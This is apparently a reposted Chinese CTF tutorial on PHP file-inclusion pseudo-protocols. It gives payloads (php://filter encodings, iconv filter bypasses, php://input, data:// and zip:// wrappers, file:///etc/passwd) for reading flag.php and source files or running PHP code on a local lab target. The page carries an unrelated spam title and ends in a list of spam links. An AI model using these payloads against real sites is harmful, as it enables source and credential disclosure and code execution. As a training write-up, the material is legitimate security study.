当前位置: 首页 > wzjs >正文

网站建设小技巧电子商务网站开发与应用的介绍

网站建设小技巧,电子商务网站开发与应用的介绍,有限公司英文,网站后台的目录在哪常见读取源码的file,php://filter和各种编码 还有执行php的 php://input和各种编码,data 在进行文件包含之前,先定位一下 Flag 文件的位置(这里可以使用工具扫) or直接访问 /flag.php 文件,结果返回为空&…

常见读取源码的file,php://filter和各种编码

还有执行php的 php://input和各种编码,data

在进行文件包含之前,先定位一下 Flag 文件的位置(这里可以使用工具扫)

or直接访问 /flag.php 文件,结果返回为空(因为不是 404,证明确实存在该文件):

尝试进行文件包含,直接包含 flag.php 的话,内容肯定会和我们直接访问一样,显示为空,所以我们需要对 flag.php 内容进行编码后再进行包含

1.file://协议

访问本地文件系统,在ctf中通常用来读取本地文件

路径+文件名

file:///etc/passwd

2.php://input:

php://input ,data://用来执行命令1.php://input 的用法
http://127.0.0.1/include.php?file=php://input
[POST DATA部分]
<?php phpinfo(); ?>2.data://用法
http://127.0.0.1/include.php?file=data://text/plain,<?php%20phpinfo();?>php://filter,file://用来读取文件3.php://filter用法
http://127.0.0.1/include.php?file=php://filter/read=convert.base64-encode/resource=phpinfo.php(读取php文件需要先加密以下才能读出来,并且拿到的源码需要进行base64解码下)
http://127.0.0.1/include.php?file=php://filter/resource=/flag
4.file://用法
http://127.0.0.1/include.php?file=file://E:\phpStudy\PHPTutorial\WWW\phpinfo.txt

3.php://filter:存在字符过滤 

php://filter php中独有的协议,可以作为一个中间流来处理其他流,可以进行任意文件的读取;

filter:这个协议可以用来过滤一些东西;

不同的参数

read参数和resource参数,

当然还可以用write参数,这时我们可以通过指定写的方式来对文件进行一些改变;

(1)String Filters(字符串过滤器)

php://filter/string.rot13/resource=flag.php //读出以后利用ROT13解码即可
php://filter/string.toupper/resource=flag.php //转大写
php://filter/string.tolower/resource=flag.php //转小写
php://filter/string.strip_tags/resource=flag.php //php标签里所有东西都会被去除,

vs html只有标签会被去除,里面的文字不会删除【闭合了】


(2)Conversion Filters(转换过滤器)

php://filter/convert.base64-encode/resource=flag.php //base64加密读出
php://filter/convert.quoted-printable-encode/resource=flag.php 
convert.iconv.*:用法:


<input-encoding>和<output-encoding> 就是编码方式,有如下几种:

PHP: Supported Character Encodings - Manual

做成字典爆破:

/?filename=php://filter/convert.iconv.CP1252.UTF-32%2a/resource=flag.php

 

data://协议

php>=5.2.0

可以使用data://数据流封装器,以传递【相应格式】的数据

执行php代码:
data://text/plain, ???


http://127.0.0.1/include.php?file=data://text/plain,<?php%20phpinfo();?>


zip:// & bzip:// & zlib:// 协议


可以访问压缩文件中的子文件,更重要的是不需要指定后缀名,可以修改为任意后缀名

payload:

php://filter/zlib.deflate|zlib.inflate/resource=flag.php        //zlib.deflate(压缩)|zlib.inflate(解压)
or
php://filter/bzip2.compress|bzip2.decompress/resource=flag.php   //bzip2.compress(压缩)|bzip2.decompress(解压)

or
1.zip://[压缩文件绝对路径]%23[压缩文件内的子文件文件名]

(# 的编码为 %23)

压缩 phpinfo.txt 为phpinfo.zip ,压缩包重命名为 phpinfo.jpg ,并上传

http://127.0.0.1/include.php?file=zip://E:\phpStudy\PHPTutorial\WWW\phpinfo.jpg%23phpinfo.txt


2.compress.bzip2://file.bz2

压缩phpinfo.txt 为phpinfo.bz2 并上传(同样支持任意后缀名)

http://127.0.0.1/include.php?file=compress.bzip2://E:\phpStudy\PHPTutorial\WWW\phpinfo.bz2


3.compress.zlib://file.gz

压缩phpinfo.txt 为phpinfo.gz 并上传(支持任意后缀名)

http://127.0.0.1/include.php?file=compress.zlib://E:\phpStudy\PHPTutorial\WWW\phpinfo.gz

iconv函数

完成各种字符集间的转换

$string = "XXXX";

iconv("utf8","gbk",$string)  //将字符串string 编码由utf8转变成gbk;

直接访问check.php这个文件里面的内容

/?filename=php://filter/convert.iconv.utf8.utf16/resource=check.php

 如果使用括号里面的编码参数会直接提示do not hack!

查看flag.php

注意伪协议里面的编码使用:/?filename=php://filter/convert.iconv.utf8.utf16/resource=flag.php


文章转载自:

http://0uTuHjLe.Lqgfm.cn
http://20ywGZMx.Lqgfm.cn
http://H3YhSoUy.Lqgfm.cn
http://FEKrMMel.Lqgfm.cn
http://W2rf3K24.Lqgfm.cn
http://lQC7RJZV.Lqgfm.cn
http://GPm8qESa.Lqgfm.cn
http://IoCjs8eh.Lqgfm.cn
http://g9J5N8I9.Lqgfm.cn
http://C67xYzeE.Lqgfm.cn
http://c5bAh9oJ.Lqgfm.cn
http://LzQZWHqq.Lqgfm.cn
http://VEsOscxV.Lqgfm.cn
http://GmvITStw.Lqgfm.cn
http://48PlZdFC.Lqgfm.cn
http://RLApJqyX.Lqgfm.cn
http://xDo2F049.Lqgfm.cn
http://AB1tOt4N.Lqgfm.cn
http://5RxWsIqE.Lqgfm.cn
http://XHcbEctX.Lqgfm.cn
http://GqxkdRC6.Lqgfm.cn
http://ByG3XgHF.Lqgfm.cn
http://jVUuEsGw.Lqgfm.cn
http://7irUIXQT.Lqgfm.cn
http://Q26ffVHl.Lqgfm.cn
http://pQAfHnal.Lqgfm.cn
http://4l2V7XSU.Lqgfm.cn
http://Dpw1y39g.Lqgfm.cn
http://twHDDUDA.Lqgfm.cn
http://aQGapsIf.Lqgfm.cn
http://www.dtcms.com/wzjs/696277.html

相关文章:

  • 泉州网站建设外包河南省新闻联播
  • 深圳手机端网站建设模板瑞幸咖啡网站建设方案
  • 做网站 如何注册公司wordpress 按点击排序
  • 互联网网站案例免费做金融网站
  • 网站设计编辑龙岩公司注册流程
  • 网站备案怎么换学的网络工程
  • 青岛网站建设定制网页视频下载器app免费
  • 360搜索网站提交入口知名网站建设官网
  • 网站后台发了文章看不到4399网页游戏官网
  • 网站开发数据郑州网站建设外贸
  • Python做网站难不难网站搭建空间
  • dede网站下载在手机上自建网站怎么弄
  • 滨州网站开发公司怎么找平台推广
  • 个人可以做的外贸网站如何建设手机网站首页
  • 建设工程信息网站有哪些如何进入wordpress
  • p2p网站制作流程wordpress 舆情管理系统
  • 公司做网站好wordpress免费域名
  • 本地的佛山网站建设制作ppt模板的软件
  • 找培训学校去哪个网站贵州省教育厅办公室关于开展2014年学校门户网站建设评估的通知
  • 爱网是什么网站无锡做网站需要多少钱
  • 网站制作怎么做搜索栏海东商城网站建设
  • 响应式网站设计规则做网站所具备的的条件
  • 网站开发技术的比较wordpress 4.9 下载
  • 当铺网站建设方案化妆品网站设计方案
  • 二十一冶建设有限公司网站简洁网站首页html代码
  • 怎么上传文件到ftp网站胶州网站建设公司
  • wordpress付费文章公众号seo排名
  • 三合一网站怎么建立2008年互联网公司排名
  • 域名注册哪个网站好wordpress的导航代码
  • 深圳怎么注册公司网站公会网站建设